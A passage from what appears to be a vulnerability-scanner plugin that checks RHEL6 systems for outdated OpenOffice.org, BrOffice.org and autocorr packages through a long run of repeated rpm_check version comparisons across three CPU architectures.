reference:\"autocorr-pl-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-pt-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-ru-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-sk-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-sl-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-sv-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-tr-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-vi-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-zh-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"broffice.org-base-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"broffice.org-base-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"broffice.org-base-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"broffice.org-brand-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"broffice.org-brand-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"broffice.org-brand-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"broffice.org-calc-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"broffice.org-calc-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"broffice.org-calc-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"broffice.org-draw-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"broffice.org-draw-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"broffice.org-draw-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"broffice.org-impress-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"broffice.org-impress-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"broffice.org-impress-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"broffice.org-math-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"broffice.org-math-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"broffice.org-math-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"broffice.org-writer-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"broffice.org-writer-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"broffice.org-writer-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-base-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-base-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-base-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-base-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-base-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-base-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-brand-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-brand-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-brand-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-bsh-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-bsh-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-bsh-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-calc-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-calc-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-calc-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-calc-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-calc-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-calc-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"openoffice.org-debuginfo-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"openoffice.org-devel-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-draw-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-draw-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-draw-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-draw-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-draw-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-draw-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-emailmerge-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-emailmerge-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-emailmerge-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-graphicfilter-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-graphicfilter-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-graphicfilter-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-headless-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-headless-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-headless-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-impress-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-impress-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-impress-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-impress-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-impress-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-impress-core-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-javafilter-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-javafilter-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-javafilter-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-af_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-af_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-af_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ar-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ar-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ar-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-as_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-as_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-as_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-bg_BG-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-bg_BG-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-bg_BG-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-bn-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-bn-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-bn-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ca_ES-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ca_ES-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ca_ES-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-cs_CZ-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-cs_CZ-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-cs_CZ-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-cy_GB-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-cy_GB-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-cy_GB-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-da_DK-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-da_DK-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-da_DK-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-de-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-de-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-de-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-dz-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-dz-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-dz-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-el_GR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-el_GR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-el_GR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-en-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-en-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-en-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-es-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-es-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-es-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-et_EE-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-et_EE-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-et_EE-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-eu_ES-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-eu_ES-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-eu_ES-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-fi_FI-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-fi_FI-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-fi_FI-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-fr-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-fr-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-fr-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ga_IE-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ga_IE-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ga_IE-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-gl_ES-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-gl_ES-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-gl_ES-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-gu_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-gu_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-gu_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-he_IL-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-he_IL-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-he_IL-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-hi_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-hi_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-hi_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-hr_HR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-hr_HR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-hr_HR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-hu_HU-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-hu_HU-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-hu_HU-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-it-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-it-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-it-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ja_JP-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ja_JP-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ja_JP-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-kn_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-kn_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-kn_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ko_KR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ko_KR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ko_KR-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-lt_LT-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-lt_LT-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-lt_LT-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-mai_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-mai_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-mai_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ml_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ml_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ml_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-mr_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-mr_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-mr_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-ms_MY-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-ms_MY-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ms_MY-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-nb_NO-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-nb_NO-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nb_NO-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-nl-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-nl-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nl-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-nn_NO-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-nn_NO-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nn_NO-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-nr_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-nr_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nr_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-nso_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-nso_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nso_ZA-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-or_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-or_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-or_IN-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openoffice.org-langpack-pa-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openoffice.org-langpack-pa-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", 